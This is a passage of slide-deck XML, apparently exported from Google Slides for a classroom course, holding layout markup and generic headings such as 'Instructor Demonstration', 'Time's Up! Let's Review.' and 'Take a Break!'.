          <p:cNvPr id="2195" name="Google Shape;2195;p1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196" name="Google Shape;2196;p1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197" name="Google Shape;2197;p147"/>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198" name="Google Shape;2198;p14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99" name="Google Shape;2199;p147"/>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200" name="Google Shape;2200;p1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01" name="Google Shape;2201;p14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14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03" name="Google Shape;2203;p14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14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05" name="Google Shape;2205;p14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14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07" name="Google Shape;2207;p14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14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09" name="Google Shape;2209;p14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14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11" name="Google Shape;2211;p14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14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13" name="Google Shape;2213;p14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14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15" name="Google Shape;2215;p14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14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217" name="Google Shape;2217;p14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18" name="Google Shape;2218;p147"/>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19" name="Google Shape;2219;p14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20" name="Google Shape;2220;p147"/>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21" name="Google Shape;2221;p14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22" name="Google Shape;2222;p147"/>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3" name="Google Shape;2223;p14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4" name="Google Shape;2224;p147"/>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225"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2226" name="Google Shape;2226;p1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27" name="Google Shape;2227;p1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228" name="Google Shape;2228;p148"/>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229" name="Google Shape;2229;p14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230" name="Google Shape;2230;p148"/>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231" name="Google Shape;2231;p1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32" name="Google Shape;2232;p14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14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34" name="Google Shape;2234;p14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14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36" name="Google Shape;2236;p14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14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38" name="Google Shape;2238;p14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14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40" name="Google Shape;2240;p14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14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42" name="Google Shape;2242;p14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14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44" name="Google Shape;2244;p14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14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46" name="Google Shape;2246;p14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14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248" name="Google Shape;2248;p148"/>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49" name="Google Shape;2249;p148"/>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50" name="Google Shape;2250;p148"/>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51" name="Google Shape;2251;p148"/>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52" name="Google Shape;2252;p148"/>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3" name="Google Shape;2253;p148"/>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4" name="Google Shape;2254;p148"/>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5" name="Google Shape;2255;p148"/>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256"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2257" name="Google Shape;2257;p1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58" name="Google Shape;2258;p1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259" name="Google Shape;2259;p149"/>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260" name="Google Shape;2260;p14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261" name="Google Shape;2261;p149"/>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262" name="Google Shape;2262;p1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63" name="Google Shape;2263;p1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1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65" name="Google Shape;2265;p1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1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67" name="Google Shape;2267;p1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1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69" name="Google Shape;2269;p1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1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71" name="Google Shape;2271;p1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1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73" name="Google Shape;2273;p1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1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75" name="Google Shape;2275;p1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14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77" name="Google Shape;2277;p1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1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279" name="Google Shape;2279;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3364992"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2280" name="Google Shape;2280;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559808"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2281" name="Google Shape;2281;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5677992"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2282" name="Google Shape;2282;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="6872808"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2283" name="Google Shape;2283;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7997952"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2284" name="Google Shape;2284;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9168384"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2285" name="Google Shape;2285;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10338816"/>
            <a:ext cx="1267638" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2286" name="Google Shape;2286;p149"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>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287"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2288" name="Google Shape;2288;p150"/>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2289" name="Google Shape;2289;p150"/>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8000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="8000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>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90" name="Google Shape;2290;p15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91" name="Google Shape;2291;p15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2292" name="Google Shape;2292;p150"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206222" y="2052600"/>
            <a:ext cx="19965206" cy="4949711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2293" name="Google Shape;2293;p150"/>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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>FIST TO FIVE:</a:t>
            </a:r>
            <a:endParaRPr sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2294" name="Google Shape;2294;p150"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146399" y="8818867"/>
            <a:ext cx="120849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295"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2296" name="Google Shape;2296;p15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297" name="Google Shape;2297;p15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98" name="Google Shape;2298;p15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99" name="Google Shape;2299;p151"/>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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time’s Up! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Let’s Review.</a:t>
            </a:r>
            <a:endParaRPr sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2300" name="Google Shape;2300;p151"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10559806" y="3048000"/>
            <a:ext cx="3258038" cy="4368660"/>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301"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2302" name="Google Shape;2302;p152"/>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03" name="Google Shape;2303;p152"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-114370" y="-64333"/>
            <a:ext cx="24606389" cy="13841059"/>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304"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2305" name="Google Shape;2305;p153"/>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06" name="Google Shape;2306;p153"/>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07" name="Google Shape;2307;p153"/>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Take a Break!</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2308" name="Google Shape;2308;p153"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146399" y="3916000"/>
            <a:ext cx="12084900" cy="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309"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2310" name="Google Shape;2310;p15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11" name="Google Shape;2311;p15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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2312" name="Google Shape;2312;p154"/>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2313" name="Google Shape;2313;p154"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5461509" y="1323033"/>
            <a:ext cx="13454633" cy="11067052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="49803"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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314"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2315" name="Google Shape;2315;p15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16" name="Google Shape;2316;p155"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-114370" y="-64333"/>
            <a:ext cx="24606389" cy="1384105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30"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Google Shape;131;p41"/>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32" name="Google Shape;132;p4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133" name="Google Shape;133;p4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4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5" name="Google Shape;135;p41"/>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marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="7200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Instructor Demonstration</a:t>
            </a:r>
            <a:endParaRPr sz="7200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p4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37" name="Google Shape;137;p41"/>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8" name="Google Shape;138;p41"/>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39"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140" name="Google Shape;140;p42"/>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41" name="Google Shape;141;p42"/>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2" name="Google Shape;142;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p42"/>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4" name="Google Shape;144;p42"/>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145" name="Google Shape;145;p42"/>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46" name="Google Shape;146;p4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42"/>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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p4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9" name="Google Shape;149;p42"/>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50"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="151" name="Google Shape;151;p43"/>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52" name="Google Shape;152;p4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3" name="Google Shape;153;p43"/>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54" name="Google Shape;154;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5" name="Google Shape;155;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6" name="Google Shape;156;p43"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p43"/>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58" name="Google Shape;158;p43"/>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9" name="Google Shape;159;p43"/>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60"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Google Shape;161;p44"/>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62" name="Google Shape;162;p4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3" name="Google Shape;163;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p4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5" name="Google Shape;165;p44"/>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6" name="Google Shape;166;p44"/>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7" name="Google Shape;167;p44"/>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Suggested Time:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p4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69" name="Google Shape;169;p44"/>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70"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p45"/>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2" name="Google Shape;172;p4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3" name="Google Shape;173;p45"/>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74" name="Google Shape;174;p45"/>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75" name="Google Shape;175;p45"/>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6" name="Google Shape;176;p45"/>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77" name="Google Shape;177;p45"/>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78" name="Google Shape;178;p45"/>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79" name="Google Shape;179;p45"/>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80"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181" name="Google Shape;181;p46"/>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82" name="Google Shape;182;p4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183" name="Google Shape;183;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="208"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2288388" y="2927000"/>
            <a:ext cx="4631755" cy="5280200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;p4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 name="Google Shape;185;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p4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87" name="Google Shape;187;p46"/>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8" name="Google Shape;188;p46"/>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Due Date:</a:t>
            </a:r>
            <a:endParaRPr sz="3500" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p4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0" name="Google Shape;190;p46"/>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91"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p47"/>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93" name="Google Shape;193;p4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94" name="Google Shape;194;p47"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="195" name="Google Shape;195;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="503"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="22013117" y="11202333"/>
            <a:ext cx="1462661" cy="1663773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;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97" name="Google Shape;197;p47"/>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8" name="Google Shape;198;p47"/>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99" name="Google Shape;199;p47"/>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0" name="Google Shape;200;p4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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
